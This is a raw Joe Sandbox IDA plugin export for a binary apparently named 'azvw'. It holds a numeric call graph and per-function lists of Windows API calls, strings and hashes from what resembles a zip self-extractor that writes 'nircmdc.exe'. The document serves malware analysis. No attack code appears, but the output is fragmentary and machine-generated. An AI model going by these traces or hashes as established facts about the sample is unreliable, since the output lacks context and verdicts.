15102->15103 15103->15106 15104->15100 15105->15100 15106->15077 15292 413847 15293 413853 GetCurrentProcess TerminateProcess 15292->15293 15296 413864 15292->15296 15293->15296 15294 4138de 15295 4138ce ExitProcess 15296->15294 15296->15295 15671 405848 15672 405853 15671->15672 15676 4058bd 15671->15676 15675 406640 3 API calls 15672->15675 15672->15676 15673 405938 15674 405973 15673->15674 15690 40f740 15673->15690 15681 406640 3 API calls 15674->15681 15679 4058a5 15675->15679 15676->15673 15677 4059dc 15676->15677 15678 40590f 15676->15678 15685 406640 3 API calls 15677->15685 15684 412920 26 API calls 15678->15684 15682 412920 26 API calls 15679->15682 15683 40599d 15681->15683 15682->15676 15686 412920 26 API calls 15683->15686 15684->15673 15687 4059ff 15685->15687 15689 4059ad 15686->15689 15688 
412920 26 API calls 15687->15688 15688->15673 15691 4144da 16 API calls 15690->15691 15692 40f751 15691->15692 15693 40f974 15692->15693 15694 40fb60 71 API calls 15692->15694 15693->15674 15695 40f775 CreateFileA 15694->15695 15696 40f7ea 15695->15696 15697 40f7ac SetFileAttributesA 15695->15697 15699 40f8b7 15696->15699 15703 40fac0 GetVersion 15696->15703 15697->15696 15698 40f7bf GetLastError 15697->15698 15702 412920 26 API calls 15698->15702 15700 40f8d3 GetLastError 15699->15700 15701 40f905 15699->15701 15704 412920 26 API calls 15700->15704 15705 40f909 SetFileTime 15701->15705 15706 40f96d CloseHandle 15701->15706 15707 40f7d3 15702->15707 15708 40f814 15703->15708 15709 40f8e7 15704->15709 15705->15706 15710 40f943 GetLastError 15705->15710 15706->15693 15707->15696 15708->15699 15712 40f980 70 API calls 15708->15712 15709->15674 15711 412920 26 API calls 15710->15711 15714 40f956 15711->15714 15713 40f83d 15712->15713 15713->15699 15715 40f873 15713->15715 15716 406640 3 API calls 15713->15716 15714->15706 15718 412920 26 API calls 15715->15718 15717 40f863 15716->15717 15719 412920 26 API calls 15717->15719 15718->15699 15719->15715 14370 406760 14392 411df0 14370->14392 14372 40676f 14373 4067be 14372->14373 14374 406791 14372->14374 14375 40677f 14372->14375 14414 41391a 14373->14414 14432 41c068 14374->14432 14426 41c073 GetFileAttributesA 14375->14426 14380 40678e 14380->14374 14382 4067d9 14386 406640 3 API calls 14382->14386 14383 40681a 14417 40f6d0 14383->14417 14385 4067a2 14388 406640 3 API calls 14385->14388 14389 4067b6 14386->14389 14387 406827 14388->14389 14390 412920 26 API calls 14389->14390 14391 4067fd 14390->14391 14435 41c29c 14392->14435 14395 411e10 14397 40fdc0 36 API calls 14395->14397 14396 411f48 GetFileAttributesA 14398 411f94 14396->14398 14399 411f56 14396->14399 14400 411e17 CreateFileA 14397->14400 14398->14372 14399->14398 14403 407730 55 API calls 14399->14403 14401 411e40 GetFileTime CloseHandle 14400->14401 14402 
411f3e 14400->14402 14401->14402 14404 411e67 14401->14404 14402->14372 14405 411f70 14403->14405 14413 411e74 14404->14413 14472 412020 FileTimeToLocalFileTime 14404->14472 14405->14372 14407 411ee3 14408 411ef6 14407->14408 14409 412020 57 API calls 14407->14409 14410 411f1e 14408->14410 14411 412020 57 API calls 14408->14411 14409->14408 14410->14372 14412 411f3b 14411->14412 14412->14402 14413->14372 14547 4138fa 14414->14547 14416 4067cd 14416->14382 14416->14383 14418 40f6b0 GetVersion 14417->14418 14420 40f6d7 14418->14420 14419 40f6db 14419->14387 14420->14419 14421 40f6ee SetFilePointer 14420->14421 14422 40f70a 14421->14422 14423 40f70f SetEndOfFile 14421->14423 14422->14387 14424 40f720 SetFilePointer 14423->14424 14425 40f71a 14423->14425 14424->14387 14425->14387 14427 41c082 SetFileAttributesA 14426->14427 14428 41c09e GetLastError 14426->14428 14427->14428 14431 41c0af 14427->14431 14429 41c0aa 14428->14429 14429->14380 14431->14380 14616 41c03e DeleteFileA 14432->14616 14434 40679b 14434->14373 14434->14385 14436 41c2b6 14435->14436 14437 41c2f3 14436->14437 14438 41c2c4 14436->14438 14471 411e05 14436->14471 14485 41ca52 GetCurrentDirectoryA 14437->14485 14438->14471 14481 41ca95 14438->14481 14441 41c2f8 FindFirstFileA 14443 41c3be FileTimeToLocalFileTime 14441->14443 14447 41c317 14441->14447 14444 41c532 GetLastError 14443->14444 14445 41c3d7 FileTimeToSystemTime 14443->14445 14514 419c07 14444->14514 14445->14444 14448 41c3ed 14445->14448 14447->14471 14489 41c9af 14447->14489 14450 419a07 52 API calls 14448->14450 14452 41c411 14450->14452 14453 41c42a FileTimeToLocalFileTime 14452->14453 14454 41c47d 14452->14454 14453->14444 14455 41c443 FileTimeToSystemTime 14453->14455 14457 41c498 FileTimeToLocalFileTime 14454->14457 14459 41c493 FindClose 14454->14459 14455->14444 14456 41c459 14455->14456 14458 419a07 52 API calls 14456->14458 14457->14444 14460 41c4b1 FileTimeToSystemTime 14457->14460 14458->14454 14467 41c4f6 14459->14467 14460->14444 
14464 41c4c3 14460->14464 14461 41c33e 14462 41c35e GetDriveTypeA 14461->14462 14461->14471 14465 41c36a 14462->14465 14462->14471 14466 419a07 52 API calls 14464->14466 14468 419a07 52 API calls 14465->14468 14466->14459 14504 41c1e4 14467->14504 14470 41c398 14468->14470 14470->14467 14471->14395 14471->14396 14473 412046 FileTimeToSystemTime 14472->14473 14474 412038 14472->14474 14476 41210d 14473->14476 14478 412064 14473->14478 14475 413f9e 55 API calls 14474->14475 14477 41203e 14475->14477 14476->14407 14477->14407 14478->14476 14479 413c4c 52 API calls 14478->14479 14480 4120f5 14479->14480 14480->14407 14482 41caa5 14481->14482 14484 41c2ed 14481->14484 14483 41918f 9 API calls 14482->14483 14482->14484 14483->14484 14484->14441 14486 41ca8a 14485->14486 14487 41ca74 14485->14487 14486->14441 14487->14486 14516 41bd99 14487->14516 14490 41ca41 14489->14490 14491 41c9bf 14489->14491 14522 41ccf4 14490->14522 14491->14490 14493 41c9c4 14491->14493 14494 41c9ef GetFullPathNameA 14493->14494 14496 413274 12 API calls 14493->14496 14495 41ca03 14494->14495 14500 41ca1c 14494->14500 14498 41c9dc 14495->14498 14499 413326 ___free_lc_time 7 API calls 14495->14499 14497 41c9d5 14496->14497 14497->14494 14497->14498 14498->14461 14499->14498 14500->14498 14501 41ca2c GetLastError 14500->14501 14502 413326 ___free_lc_time 7 API calls 14500->14502 14501->14498 14503 41ca2b 14502->14503 14503->14501 14505 41c1fb 14504->14505 14506 41c27c 14505->14506 14537 41c841 14505->14537 14506->14471 14509 41c841 15 API calls 14510 41c25a 14509->14510 14510->14506 14511 41c841 15 API calls 14510->14511 14512 41c26b 14511->14512 14512->14506 14513 41c841 15 API calls 14512->14513 14513->14506 14515 419c18 FindClose 14514->14515 14515->14471 14518 41bdc4 14516->14518 14521 41bda7 14516->14521 14517 41bde0 14520 41918f 9 API calls 14517->14520 14517->14521 14518->14517 14519 41338f 6 API calls 14518->14519 14519->14517 14520->14521 14521->14486 14525 41cd07 14522->14525 14524 41cd03 
14524->14498 14526 41cd18 14525->14526 14527 41cd6a GetCurrentDirectoryA 14525->14527 14534 41cdd8 14526->14534 14531 41cd7c 14527->14531 14530 41cd3c GetFullPathNameA 14530->14531 14532 413274 12 API calls 14531->14532 14533 41cd23 14531->14533 14532->14533 14533->14524 14535 41cde2 GetDriveTypeA 14534->14535 14536 41cd1e 14534->14536 14535->14536 14536->14530 14536->14533 14538 41c853 14537->14538 14542 41c865 14537->14542 14543 41a950 14538->14543 14540 41c249 14540->14506 14540->14509 14541 41918f 9 API calls 14541->14542 14542->14540 14542->14541 14544 41a968 14543->14544 14545 41a9a3 14543->14545 14544->14540 14545->14544 14546 413b4f 15 API calls 14545->14546 14546->14545 14553 418fbc 14547->14553 14549 413903 14549->14416 14554 418fd0 14553->14554 14555 4138ff 14553->14555 14554->14555 14556 413274 12 API calls 14554->14556 14555->14549 14557 418e4c 14555->14557 14556->14555 14560 418e6b 14557->14560 14558 413916 14558->14416 14560->14558 14561 41b7f2 14560->14561 14562 41b80f 14561->14562 14563 41b84e 14562->14563 14582 414317 14562->14582 14563->14558 14566 41b98b CreateFileA 14567 41b9aa GetFileType 14566->14567 14568 41b9bc GetLastError 14566->14568 14569 41b9d0 14567->14569 14570 41b9b5 CloseHandle 14567->14570 14568->14563 14586 4143ac 14569->14586 14570->14568 14573 41908b 2 API calls 14574 41ba29 14573->14574 14575 41ba34 14574->14575 14590 41b5e5 14574->14590 14575->14563 14579 419c6e 3 API calls 14575->14579 14577 41ba52 14578 41ba68 14577->14578 14600 41be65 14577->14600 14578->14575 14580 41908b 2 API calls 14578->14580 14579->14563 14580->14575 14584 414326 14582->14584 14583 413274 12 API calls 14585 414361 14583->14585 14584->14583 14584->14585 14585->14563 14585->14566 14587 414402 14586->14587 14588 4143ba 14586->14588 14587->14563 14587->14573 14588->14587 14589 4143fc SetStdHandle 14588->14589 14589->14587 14591 41b5fd 14590->14591 14594 41b680 14590->14594 14592 41b65a ReadFile 14591->14592 14591->14594 14593 41b673 GetLastError 
14592->14593 14596 41b6ad 14592->14596 14593->14594 14594->14577 14595 41b726 ReadFile 14597 41b744 GetLastError 14595->14597 14598 41b74e 14595->14598 14596->14594 14596->14595 14597->14598 14598->14596 14599 41908b 2 API calls 14598->14599 14599->14598 14601 41be72 14600->14601 14602 41908b 2 API calls 14601->14602 14611 41bf92 14601->14611 14603 41beaa 14602->14603 14604 41908b 2 API calls 14603->14604 14603->14611 14605 41bec2 14604->14605 14606 41bf47 14605->14606 14605->14611 14615 41bed8 14605->14615 14607 41bf24 14606->14607 14608 41908b 2 API calls 14606->14608 14609 41908b 2 API calls 14607->14609 14610 41bf54 14608->14610 14609->14611 14612 41bf5a SetEndOfFile 14610->14612 14611->14578 14612->14607 14613 41bf72 GetLastError 14612->14613 14613->14607 14614 415612 6 API calls 14614->14615 14615->14607 14615->14614 14617 41c04c GetLastError 14616->14617 14618 41c054 14616->14618 14617->14618 14618->14434 15406 414878 GetVersion 15417 417635 HeapCreate 15406->15417 15408 4148d6 15429 418ac8 15408->15429 15410 4148ec GetCommandLineA 15443 41a052 15410->15443 15414 414906 15475 419d4c 15414->15475 15416 41490b 15418 417655 15417->15418 15419 41768b 15417->15419 15488 4174ed 15418->15488 15419->15408 15422 417671 15425 41768e 15422->15425 15426 4181d9 5 API calls 15422->15426 15423 417664 15500 417692 HeapAlloc 15423->15500 15425->15408 15427 41766e 15426->15427 15427->15425 15428 41767f HeapDestroy 15427->15428 15428->15419 15430 413274 12 API calls 15429->15430 15431 418ad9 15430->15431 15432 414957 7 API calls 15431->15432 15433 418ae7 GetStartupInfoA 15431->15433 15432->15433 15439 418bf8 15433->15439 15442 418b33 15433->15442 15435 418c1f GetStdHandle 15437 418c2d GetFileType 15435->15437 15435->15439 15436 418c5f SetHandleCount 15436->15410 15437->15439 15438 413274 12 API calls 15438->15442 15439->15435 15439->15436 15440 418ba4 15440->15439 15441 418bc6 GetFileType 15440->15441 15441->15440 15442->15438 15442->15439 15442->15440 15444 41a0a0 
15443->15444 15445 41a06d GetEnvironmentStringsW 15443->15445 15447 41a075 15444->15447 15448 41a091 15444->15448 15446 41a081 GetEnvironmentStrings 15445->15446 15445->15447 15446->15448 15451 4148fc 15446->15451 15449 41a0b9 WideCharToMultiByte 15447->15449 15450 41a0ad GetEnvironmentStringsW 15447->15450 15448->15451 15452 41a133 GetEnvironmentStrings 15448->15452 15453 41a13f 15448->15453 15455 41a0ed 15449->15455 15456 41a11f FreeEnvironmentStringsW 15449->15456 15450->15449 15450->15451 15466 419e05 15451->15466 15452->15451 15452->15453 15457 413274 12 API calls 15453->15457 15458 413274 12 API calls 15455->15458 15456->15451 15464 41a15a 15457->15464 15459 41a0f3 15458->15459 15459->15456 15460 41a0fc WideCharToMultiByte 15459->15460 15461 41a116 15460->15461 15462 41a10d 15460->15462 15461->15456 15465 413326 ___free_lc_time 7 API calls 15462->15465 15463 41a170 FreeEnvironmentStringsA 15463->15451 15464->15463 15465->15461 15467 419e17 15466->15467 15468 419e1c GetModuleFileNameA 15466->15468 15516 4155f6 15467->15516 15470 419e3f 15468->15470 15471 413274 12 API calls 15470->15471 15472 419e60 15471->15472 15473 414957 7 API calls 15472->15473 15474 419e70 15472->15474 15473->15474 15474->15414 15476 419d59 15475->15476 15479 419d5e 15475->15479 15477 4155f6 19 API calls 15476->15477 15477->15479 15478 413274 12 API calls 15480 419d8b 15478->15480 15479->15478 15481 414957 7 API calls 15480->15481 15487 419d9f 15480->15487 15481->15487 15482 419de2 15483 413326 ___free_lc_time 7 API calls 15482->15483 15484 419dee 15483->15484 15484->15416 15485 413274 12 API calls 15485->15487 15486 414957 7 API calls 15486->15487 15487->15482 15487->15485 15487->15486 15502 41b280 15488->15502 15491 417530 GetEnvironmentVariableA 15495 41754f 15491->15495 15499 41760d 15491->15499 15492 417516 15492->15491 15493 417528 15492->15493 15493->15422 15493->15423 15496 417594 GetModuleFileNameA 15495->15496 15497 41758c 15495->15497 15496->15497 15497->15499 15504 41afdb 
15497->15504 15499->15493 15507 4174c0 GetModuleHandleA 15499->15507 15501 4176ae 15500->15501 15501->15427 15503 4174fa GetVersionExA 15502->15503 15503->15491 15503->15492 15509 41aff2 15504->15509 15508 4174d7 15507->15508 15508->15493 15511 41b00a 15509->15511 15510 41338f 6 API calls 15510->15511 15511->15510 15513 41b03a 15511->15513 15512 41338f 6 API calls 15512->15513 15513->15512 15514 41bd99 15 API calls 15513->15514 15515 41afee 15513->15515 15514->15513 15515->15499 15517 4155ff 15516->15517 15519 415606 15516->15519 15520 415232 15517->15520 15519->15468 15527 4153cb 15520->15527 15522 4153bf 15522->15519 15524 415275 GetCPInfo 15526 415289 15524->15526 15526->15522 15532 415471 GetCPInfo 15526->15532 15528 4153eb 15527->15528 15529 4153db GetOEMCP 15527->15529 15530 4153f0 GetACP 15528->15530 15531 415243 15528->15531 15529->15528 15530->15531 15531->15522 15531->15524 15531->15526 15533 41555c 15532->15533 15536 415494 15532->15536 15533->15522 15534 4188a6 6 API calls 15535 415510 15534->15535 15537 41918f 9 API calls 15535->15537 15536->15534 15538 415534 15537->15538 15539 41918f 9 API calls 15538->15539 15539->15533 14619 407200 14620 40722d 14619->14620 14642 411da0 GetStdHandle GetConsoleScreenBufferInfo 14620->14642 14623 4072a5 14644 41392d 14623->14644 14624 413a3a 18 API calls 14624->14623 14626 407468 14629 415612 6 API calls 14626->14629 14634 407506 14626->14634 14627 407368 14627->14626 14630 415612 6 API calls 14627->14630 14633 41392d 8 API calls 14627->14633 14627->14634 14628 4072c2 14628->14627 14635 407339 14628->14635 14636 413a3a 18 API calls 14628->14636 14631 407493 14629->14631 14630->14627 14632 41392d 8 API calls 14631->14632 14631->14634 14638 4074a9 14632->14638 14633->14627 14637 41392d 8 API calls 14635->14637 14636->14635 14637->14627 14638->14634 14639 415612 6 API calls 14638->14639 14640 4074ec 14639->14640 14640->14634 14641 41392d 8 API calls 14640->14641 14641->14634 14643 407275 14642->14643 14643->14623 

                                          APIs
                                          • FindFirstFileA.KERNELBASE(00000000,?,?,?,00000001), ref: 0041C303
                                          • GetDriveTypeA.KERNEL32(00000000), ref: 0041C35F
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C3C9
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C3DF
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C435
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C44B
                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000), ref: 0041C4A3
                                          • FileTimeToSystemTime.KERNEL32(00000000,?), ref: 0041C4B9
                                          • FindClose.KERNELBASE(?), ref: 0041C4F0
                                          • GetLastError.KERNEL32 ref: 0041C532
                                          • FindClose.KERNEL32(?), ref: 0041C542
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Time$File$FindLocalSystem$Close$DriveErrorFirstLastType
                                          • String ID: ./\

                                          APIs
                                          • IsValidCodePage.KERNEL32(00000000,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00416BD9
                                          • IsValidLocale.KERNEL32(00000001,?,00000000), ref: 00416BEF
                                          • GetLocaleInfoA.KERNEL32(00001001,?,00000040,?,00000000), ref: 00416C30
                                          • GetLocaleInfoA.KERNEL32(00001002,?,00000040,?,00000000), ref: 00416C4B
                                            • Part of subcall function 00417226: GetVersionExA.KERNEL32(?), ref: 00417240
                                            • Part of subcall function 00417068: EnumSystemLocalesA.KERNEL32(0041709F,00000001,004259A8,?,00425924,0041303A,?,00428D8C,?,?,?,00000000), ref: 00417088
                                          Strings
                                          Similarity
                                          • API ID: Locale$InfoValid$CodeEnumLocalesPageSystemVersion
                                          • String ID: l-B$|1B

                                          APIs
                                          • GetTimeZoneInformation.KERNELBASE(00428F08,00000000,00000000,00000001,00000000,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004194F5
                                          • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 0041958A
                                          • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,00000000,0000003F,00000000,?,?,0040A354,?,00000000,?,?,?,?,0040144E), ref: 004195C4
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWide$InformationTimeZone
                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                          APIs
                                          • GetLocaleInfoA.KERNELBASE(00001004,?,00000008,?,?,?,?,00416BCA,?,004259A8,?,00425924,0041303A,?,00428D8C,?), ref: 0041718E
                                          Strings
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          APIs
                                          • GetLocalTime.KERNEL32(00407739), ref: 00413FAB
                                          • GetSystemTime.KERNEL32(?), ref: 00413FB5
                                          • GetTimeZoneInformation.KERNELBASE(?), ref: 0041400A
                                          Similarity
                                          • API ID: Time$InformationLocalSystemZone

                                          APIs
                                          • CreateFileA.KERNELBASE(nircmdc.exe,40000000,00000002,00000000,00000003,00000080,00000000), ref: 0040F791
                                          • SetFileAttributesA.KERNEL32(nircmdc.exe,00000020), ref: 0040F7B5
                                          • GetLastError.KERNEL32(00000001), ref: 0040F7C1
                                          • GetLastError.KERNEL32(00000001), ref: 0040F8D5
                                          • SetFileTime.KERNELBASE(00000000,00000000,00000000,00000000), ref: 0040F939
                                          • GetLastError.KERNEL32(00000000), ref: 0040F944
                                          • CloseHandle.KERNEL32(00000000), ref: 0040F96E
                                          Strings
                                          Similarity
                                          • API ID: ErrorFileLast$AttributesCloseCreateHandleTime
                                          • String ID: CreateFile() error %d when trying set file time$SetFileTime failed: %d$warning (%d): could not set file attributes$ compressed WinNT security data missing (%d bytes)%s$%-22s $nircmdc.exe
                                          • API String ID: 1520554102-3763623673
                                          • Opcode ID: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                          • Instruction ID: ec123f940c35398d6c20d288b992aaa82a19b0590d8110fdc60b447adca6d815
                                          • Opcode Fuzzy Hash: 1ffbace52059439494c2faa23457c508adb197eeee7fbb6a1e74a0cc17ef8ed0
                                          • Instruction Fuzzy Hash: 1C51B671B402117BE720AB28BC47FB77359EB54B14F94453AF814E22C2F6B8AC18826D

                                          APIs
                                          • CompareStringW.KERNELBASE(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041AB56
                                          • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,00000002,00428D60,0040114F), ref: 0041AB73
                                          • CompareStringA.KERNEL32(?,?,00000000,0040114F,00428D60,00000002,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60), ref: 0041ABD1
                                          • GetCPInfo.KERNEL32(?,00000000,00000000,020405B4,?,00000002,00428D60,004027DD,?,?,00000002,00428D60,0040114F), ref: 0041AC22
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041ACA1
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                          • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharCompareMultiStringWide$Info
                                          • String ID:
                                          • API String ID: 1651298574-0
                                          • Opcode ID: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                          • Instruction ID: 8982f73b66f23a33087e68d4939e0b6a76c79f8fa55c1b86de23fe76a65e9542
                                          • Opcode Fuzzy Hash: 0b065d75f11689d4427d9752874f201de5120d531e926b8b3d271362c7dd42bd
                                          • Instruction Fuzzy Hash: 06719F71A05289AFCF219F94DC859EF7FB6EB05314F14412BF950A2260D3398CA5CB9B

                                          APIs
                                          • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0041026C
                                          • GetVolumeInformationA.KERNELBASE(C:/,?,00000104,?,?,?,?,00000104), ref: 004102EE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FullInformationNamePathVolume
                                          • String ID: C:/$FAT$HPFS$VFAT
                                          • API String ID: 1555998374-1151019397
                                          • Opcode ID: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                          • Instruction ID: fd030fab3a41d782d0bfb313d5ad92de2eb91019b62ba207a93a103eae62fd2d
                                          • Opcode Fuzzy Hash: f8df0c4a5d1451d0dd740bb05cf632a3427c018f7f5c4cc689e6d622af555a6f
                                          • Instruction Fuzzy Hash: CB4159B16803406AE720DB20EC4BFEB37945F94708F44442AFD9486282F6FCD9D9839E

                                          APIs
                                          • GetStartupInfoA.KERNEL32(?), ref: 00418B21
                                          • GetFileType.KERNEL32(00000800), ref: 00418BC7
                                          • GetStdHandle.KERNEL32(-000000F6), ref: 00418C20
                                          • GetFileType.KERNELBASE(00000000), ref: 00418C2E
                                          • SetHandleCount.KERNEL32 ref: 00418C65
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FileHandleType$CountInfoStartup
                                          • String ID:
                                          • API String ID: 1710529072-0
                                          • Opcode ID: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                          • Instruction ID: 9f710145433f53a11f67beba66e492aa2ca87e5ae07b95c08d009534c858da6a
                                          • Opcode Fuzzy Hash: 894f89217b4e5f8dd3dc04c4c5fc2c2138c20e103943fbb2b5c6704336baf594
                                          • Instruction Fuzzy Hash: 7F5115B16082518BD7208F28CC447D67BA0AB12325F19866EF4A6CB3E1DB78E8C5C75D

                                          APIs
                                          • GetCurrentProcess.KERNEL32(00406A5A,error: zipfile read error,00413832,00000000,00000000,00000000,00406A5A,00000003,?,?,?,?,?,?,0040519A), ref: 00413857
                                          • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,0040519A,?,?,?,?,?,?,?,?), ref: 0041385E
                                          • ExitProcess.KERNEL32 ref: 004138D8
                                          Strings
                                          • error: zipfile read error, xrefs: 00413847
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID: error: zipfile read error
                                          • API String ID: 1703294689-3207815817
                                          • Opcode ID: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                          • Instruction ID: 9a9e4aaeeafff871062add6e916ef3ed514e9f96ede6102045d5c26cbba63ca5
                                          • Opcode Fuzzy Hash: 4a3ba93995f433487ece10c790bf92c59d29a896c2850f85550fccbc002a6eb2
                                          • Instruction Fuzzy Hash: AB01C431704310ABD6206F1AFC45A9ABBD5EB84315B50443FF444A22A0DBB959C5DB9E

                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000000,00000000,0000AE00,?,?,000F8000,0040519A), ref: 0040F703
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: FilePointerVersion
                                          • String ID: 'h@
                                          • API String ID: 2103187656-431696200
                                          • Opcode ID: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                          • Instruction ID: 4378285b618a777efcf84251ec6a8b6b99a83c3f06562969f79921aa5accdbfc
                                          • Opcode Fuzzy Hash: c1835f4d64794c132d77b39ac591daec13a6916d697b3494fa6b8190a8c6d3bc
                                          • Instruction Fuzzy Hash: F1F0B43278421076E530A67DBC05FEF23488FD1774F100636F510EA1D0DA38988711AD

                                          APIs
                                          • CreateFileA.KERNELBASE(00000001,80000000,00406700,0000000C,00000001,00000080,00000000,00000000,00000000,00000000), ref: 0041B99E
                                          • GetFileType.KERNELBASE(00000000), ref: 0041B9AB
                                          • CloseHandle.KERNEL32(00000000), ref: 0041B9B6
                                          • GetLastError.KERNEL32 ref: 0041B9BC
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
